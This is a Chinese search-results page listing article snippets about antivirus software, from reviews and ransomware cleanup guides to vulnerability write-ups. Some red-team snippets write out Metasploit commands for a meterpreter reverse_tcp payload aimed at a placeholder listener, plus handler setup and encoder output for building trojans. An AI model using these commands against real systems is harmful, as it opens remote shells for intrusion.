首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏HansBug's Lab

    Codevs2018 反病毒软件

    2018 反病毒软件  时间限制: 1 s  空间限制: 128000 KB  题目等级 : 钻石 Diamond  查看运行结果 题目描述 Description 其实这个“反病毒软件”(Anti-Virus 样例输入 Sample Input 4 2 1 4 1 2 3 2 2 4 1 3 2 2 1 3 1 2 2 2 1 4 样例输出 Sample Output 0 3 1 3 数据范围及提示 Data 从1到4最多的病例数为0,第二多的病例数为0,差值为0,输出0。 城市2发现了3个新病例,病例数变为{0,3,0,0}。 从2到4最多的病例数为3,第二多的病例数为0,差值为3,输出3。 :=a3.a1; 29 a4.a0:=0;a4.a1:=0; 30 for i:=1 to 4 do 31 a4.a1:=a4.a0; 35 a4.a0:=c[i]; 36 end 37

    1.2K60发布于 2018-04-10
  • 来自专栏网络安全攻防

    【神兵利器】绕过EDR防病毒软件

    set payload windows/x64/meterpreter/reverse_tcp set LHOST <YOUR_IP> set LPORT <YOUR_PORT> run Step 4

    53710编辑于 2025-01-07
  • 来自专栏用户8851537的专栏

    分享几个在线扫描病毒软件的网站

    https://virusscan.jotti.org/ 4、可以检测某个网站是否有一些病毒挂马的网站 http://onlinelinkscan.com/

    24.9K30发布于 2021-07-26
  • 来自专栏飞雪无情的博客

    技能 | 傻瓜式应对比特币勒索病毒软件

    5月12日,英国、意大利、俄罗斯等全球多个国家爆发勒索病毒攻击,中国的校园网也未能幸免,部分高校电脑被感染,有学生毕业论文被病毒加密,只有支付高额赎金才能恢复。

    87710发布于 2018-08-28
  • 来自专栏Y5neKO博客

    一次对带病毒软件的分析

    软件下载下来打开,确实正常打开了youtube下载器,然后查看进程,发现名为 TemporaryFile的进程

    1.6K10编辑于 2022-01-13
  • 来自专栏FreeBuf

    简单方法检测远端用户的反病毒软件

    我常使用的操作系统是 Windows7,为了确保更安全,我安装了卡巴斯基互联网安全防病毒软件。一天我在一个 Web 页面上看到了一段非常有趣的代码,在我看来它不该出现在页面上。 我立刻意识到是我的反病毒软件做了 MITM,在网页上注入代码来跟踪页面的活动。 我想看看这种方法对于其他反病毒软件的检出情况,是只能检出卡巴斯基还是其他的也可以。接下来对 Avira、Norton、DrWeb 反病毒软件进行检测,如果有人想继续研究,我很高兴听到研究的结果。 Avira、Norton、DrWeb 和 Chrome 搭配进行检测,甚至还要安装插件来让反病毒软件可以注入特定数据到页面以完成对页面的检测。 这种方法并不能保证百分之百检出反病毒软件,因为用户可以禁用安装的 Chrome 扩展。 2. 这篇文章的灵感主要来自于远程检测用户反病毒软件。 3. 相关代码可以在 GitHub 上找到。

    1.4K100发布于 2018-02-09
  • 来自专栏FreeBuf

    挖洞经验 | Panda反病毒软件本地提权漏洞分析

    PoC代码 漏洞利用代码:【https://github.com/SouhailHammou/Panda-Antivirus-LPE】 * 参考来源:rce4fun,FB小编Alpha_h4ck编译,转载请注明来自

    1.5K20发布于 2019-07-17
  • 来自专栏FreeBuf

    新型勒索病毒软件GruxEr来袭:深度分析如何传播、加密及如何删除

    .MID .MP3 .MPA .WAV .WMA Video Files .3G2 .3GP .ASF .AVI .FLV .M4V .MOV .MP4 .MPG .RM .SRT .SWF .VOB 步骤4:复制你的文件。现在所有这些都是为了访问您的文件,具体取决于它们所在的位置。如果您的驱动器有两个分区,您将看到这是连接到您的计算机的两个可移动驱动器。 4.使用您的管理员帐户登录到您的计算机 ? 当您的计算机处于安全模式时,“ 安全模式 ”将显示在屏幕的所有四个角落。 对于Windows 8,8.1和10 步骤1:打开开始菜单 ? 步骤4:从左下角的扩展菜单中选择赎金的类型: ? 步骤5:点击Start Bruteforce按钮。这可能需要一些时间。 建议4: 使用本文中的一种方法备份文件。 建议5:浏览万维网时, 请务必使用安全的网页浏览器。

    1.7K60发布于 2018-02-24
  • 来自专栏用户8715145的专栏

    为什么要安装代码签名证书 从安全上扫描和杜绝病毒软件

    从安全上扫描和杜绝病毒软件 其次就是防护避免恶意攻击和篡改,在安装了之后进行软件的下载,代码签名证书会先进行安全扫描,并且验证开发者身份,确保安装包及安装过程当中不会出现病毒携带。 所以为什么要安装代码签名证书,更多的是体现在了系统运行的安全性上,可以避免被外部病毒软件或是没有安全保障的软件所侵害。

    79330发布于 2021-10-14
  • 来自专栏FreeBuf

    借壳防病毒软件,SharkBot银行木马在Google Play传播

    Affairs网站消息,Check Point Research (CPR) 团队的研究人员发布报告称,在谷歌官方 Google Play 商店中发现了几个恶意 Android 应用程序,这些应用程序伪装成防病毒软件

    1.1K40编辑于 2022-04-14
  • 来自专栏FreeBuf

    从源码层面看一款精致的病毒软件应具备哪些特质

    二、正文 本文主要从源代码来看看一款精致的病毒软件,它应该具备什么样的功能,模块化设计该如何规划。 源代码解压: ?

    74630发布于 2019-05-14
  • 2025 年最佳防病毒软件深度评测:Bitdefender、Norton、McAfee 谁才是王者?

    在这个网络威胁日益复杂化的时代,防病毒软件已不再只是“锦上添花”,而是保障个人和企业数据安全的第一道防线。从勒索病毒、木马程序到身份盗窃和钓鱼攻击,任何一个漏洞都可能导致不可挽回的损失。 作为拥有 30 年防病毒软件测试和研究经验的安全团队,我们进行了深入对比,结合 EICAR 病毒模拟包测试、第三方权威机构(AV-TEST、AV-Comparatives)结果,最终筛选出 2025 年最佳防病毒软件排行榜 结论速览:最佳整体选择:Bitdefender Total Security最佳家庭保护:Norton 360(含 LifeLock)最佳移动端安全:McAfee+ Premium为什么需要防病毒软件? 常见的风险包括:✅ 勒索软件加密系统文件,需支付赎金才能解锁✅ 恶意程序窃取登录凭证和银行信息✅ 木马劫持摄像头和麦克风,侵犯隐私防病毒软件的核心功能不仅仅是“查杀病毒”,还应具备以下能力:实时威胁防护 :检测并阻止最新恶意软件反勒索保护:防止重要文件被加密身份安全:防止账户信息泄露跨平台兼容:覆盖 Windows、macOS、Android、iOS2025 年最佳防病毒软件排名我们基于以下 6 个维度进行评测

    4.7K10编辑于 2025-09-12
  • 来自专栏超前沿网络空间安全全栈学习宝典

    红队白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒软件获取shell

    MSF 配置监听[老样子4件套] msf6 exploit(multi/handler) > back msf6 > use exploit/multi/handler [*] Using configured ] Metasploit Documentation: https://docs.metasploit.com/ msf6 > 没什么好说的[MS4件套

    97510编辑于 2024-12-25
  • 来自专栏菜鸟程序员

    多家反病毒软件存在AVGater问题,恶意软件反可利用隔离区提权

    几款常见的反病毒软件中曝出存在一种可让攻击者利用隔离区来提升恶意软件权限的问题,涉及的反病毒软件厂商具体有趋势科技、Emisoft、卡巴斯基,Malwarebytes, Check Point (ZoneAlarm 其他厂商的反病毒软件也有可能受到影响。 ? 攻击利用方法 攻击者如果侵入了计算机系统,他们总是会想要提权来获取机密数据,并自如地穿梭在网络中之中。 近日,信息安全审计员 Florian Bogner 发现了一种全新的提权方法:利用反病毒软件的隔离区特性。这种攻击方法 AVGater 的具体实现,组合利用了几个反病毒软件的设计漏洞和已知技巧。 及时更新反病毒软件产品 据了解,目前这个漏洞会影响趋势科技、Emsisoft, 卡巴斯基,Malwarebytes, Check Point (ZoneAlarm) 以及Ikarus 的反病毒软件。 其他厂商的反病毒软件也有可能受到影响(在修复程序放出之前并不会公开这些厂商的名字)。 ?

    1K40发布于 2018-06-19
  • 来自专栏菜鸟程序员

    AVGater漏洞突破防病毒软件 影响大批知名杀毒软件 PoC已经公开

    奥地利 Kapsch的信息安全审计师 Florian Bogner表示, 他发现了一种新的方法来实现这一点,也就是滥用一些防病毒软件中的检疫功能(隔离功能)。 AVGater攻击方式利用了杀毒软件的隔离功能及Windows Junctions文件链接功能 根据 Bogner的说法, 攻击从恶意 DLL 文件开始, 并由防病毒软件置于隔离文件夹中。 专家还警告说,防病病毒软件不仅可以增加黑客的攻击面, 而且还会削弱 HTTPS 的安全性。

    80150发布于 2018-06-19
  • 来自专栏FreeBuf

    Windows用户自查:微软紧急更新修复Meltdown和Spectre CPU漏洞

    目前安全研究员对于反病毒软件的兼容性制作了调查表【Google Sheet】,用户也可以查询此表了解自己使用的反病毒软件的兼容情况。 如果需要查看微软官方的告示【帮助页面】,主要是这四个页面: 1)Windows桌面用户指南 2)Windows Server用户指南 3)微软安全建议 ADV180002(包含更新软件包的KB编号) 4) 更新第三方防病毒软件用户的兼容性警告内容 反病毒软件兼容性判断 如果用户在自己系统的Windows更新功能中看到“检查更新”有新内容,则可以进行安装。 HKEY_LOCAL_MACHINE" Subkey="SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" Value="cadca5fe-87d3-4b96 补充:关于芯片组固件更新 Intel 方面在1月4号发布了新通告表示,他们保证 90%的 CPU(近5年的)固件更新会在下周结束前全部放出。目前他们已经在和其他合作伙伴进行这些 CPU 更新。

    1.4K80发布于 2018-02-24
  • 来自专栏超前沿网络空间安全全栈学习宝典

    红队白帽必经之路(18)——如何用Metasploit 制作Windows恶意木马病毒软件获取shell

    applocker_evasion_workflow_compiler normal No Applocker Evasion - Microsoft Workflow Compiler 4 4444 LPORT => 4444 msf6 exploit(multi/handler) > run 打开另一个终端,将生成的木马文件复制到 /var/www/html cp /root/.msf4/

    88510编辑于 2024-12-25
  • 来自专栏超前沿网络空间安全全栈学习宝典

    红队白帽必经之路(17)——如何用Metasploit 制作Windows恶意木马病毒软件获取shell

    shikata_ga_nai succeeded with size 462 (iteration=3) x86/shikata_ga_nai succeeded with size 489 (iteration=4) shikata_ga_nai succeeded with size 462 (iteration=3) x86/shikata_ga_nai succeeded with size 489 (iteration=4) alpha_upper succeeded with size 15338 (iteration=3) x86/alpha_upper succeeded with size 30745 (iteration=4)

    97200编辑于 2024-12-25
  • 来自专栏FreeBuf

    当“宿主”披上QQ盗号的外衣

    4-2 发送内容和主控地址 最后我们计入源码,发现发送短信的地方很多,这里我们取其中一处,如图4-3所示: ? Android中监听用户短信,一般需要申请权限—注册广播接收者—监听解析短信内容,这里我们只做简单分析,从源码中获取到短信监听的恶意代码,如图4-4所示: ? 图4-4 短信监听 获取用户设备信息和电话号码,如图4-5所示: ? 图4-5获取用户设备信息和电话号码 五、寻根问底 如果要做到病毒的下载推广,信息的动态获取,必定依赖于服务器,针对病毒软件中的服务器地址和备用地址,我们对注册域名者进行溯源追踪,为了信息安全,我们对所有敏感信息进行了技术处理 用户发现感染手机病毒软件之后,可以向“12321网络不良与垃圾信息举报受理中心”或“中国反网络病毒联盟”进行举报,使病毒软件能够第一时间被查杀和拦截。

    1.4K00发布于 2018-07-30
  • 来自专栏IT大咖说

    2022年 6 款适用于 Linux 的最佳免费杀毒软件

    针对计算机的防护,杀毒软件是一个重要手段,下面我们列出一些你可以获得的最好的免费防病毒软件。 ◆ 适用于 Linux 的最佳防病毒软件 1. ClamAV ClamAV 是一款开源防病毒软件,可检测病毒、恶意软件、特洛伊木马和其他威胁,它也免费提供,这使其成为 Linux 上最好的防病毒软件之一。 Comodo 作为 Linux 上最好的免费防病毒软件之一,Comodo 带有按需病毒扫描程序,还检查使用云数据库以检查未知文件,以确保每一天的安全。 4. Sophos 作为另一款免费的防病毒软件,Sophos 具有高级功能,并且在您的 Linux 系统上也能轻松运行。 相信从上面的列表中,你能找到适合于自己的最佳linux防病毒软件。保护你的数字资产免受计算机病毒和恶意软件的威胁。

    22.6K40编辑于 2022-04-07
领券